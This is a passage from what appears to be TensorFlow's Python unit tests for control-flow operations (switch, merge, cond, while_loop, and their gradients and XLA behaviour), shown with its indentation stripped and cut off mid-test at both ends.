if len(k.consumers()) != v:
return False
return True
def all_fetchables():
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_cond_v2
class ControlFlowTest(test.TestCase):
def testRefIdentity(self):
with self.cached_session():
v = variables.Variable(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.cached_session():
v = variables.Variable(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
variables.global_variables_initializer().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.cached_session():
v = variables.Variable(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
def testCondBool(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296297")
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
def testCondIndexedSlices(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296180")
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
def testCondSparseTensor(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296161 (SparseTensors)")
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values.eval())
self.assertAllEqual([[1], [4]], r.indices.eval())
self.assertAllEqual(r.values.get_shape(), (2,))
def testCondResource(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
variables.global_variables_initializer().run()
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(1.0, control_flow_ops.cond(rv, case, lambda: t).eval())
def testCondIndexedSlicesDifferentTypes(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113293074")
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = r.eval()
self.assertAllEqual(11, result)
def testCond_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
self._testCond_1(use_gpu=False)
self._testCond_1(use_gpu=True)
def testCond_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = r.eval()
self.assertAllEqual(9, result)
def testCond_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = r.eval()
self.assertAllEqual(12, result)
def testCond_4(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondRef(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], r.eval())
def testCondWithControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/79881896")
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, r.eval())
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
# Both v_f and v_t are uninitialized references. However, an actual use
# of the reference in the 'true' branch in the 'tf.identity' op will
# not 'fire' when v is uninitialized, so this is a valid construction.
# This test tests that ref_identity allows uninitialized ref as input
# so that this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], sess.run(merged_op.output))
def testCondSwitchIdentity(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
# Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
def testCondRecvIdentity(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
# Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
def testCondGrad_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113346829 (gpu failure)")
graph = ops.Graph()
with graph.as_default():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
with self.cached_session():
self.assertAllEqual(1.0, grad.eval())
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
def testCondGrad_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/110550782 (gradient w.r.t external variable)")
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
def testCondGrad_Gather(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113327884")
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
variables.global_variables_initializer().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 256,000 iterations/s.
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result.eval(), 2)
self.assertAllEqual(v.eval(), 1.0)
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
result.eval()
self.assertAllEqual(v.eval(), 1.0)
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.Variable(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], r.eval())
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, r.eval())
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.test_session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
# Pushes to the stack = product of maximum_iterations values;
# the last two "3"s comes from size(p), when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(42, result)
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2].eval()
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
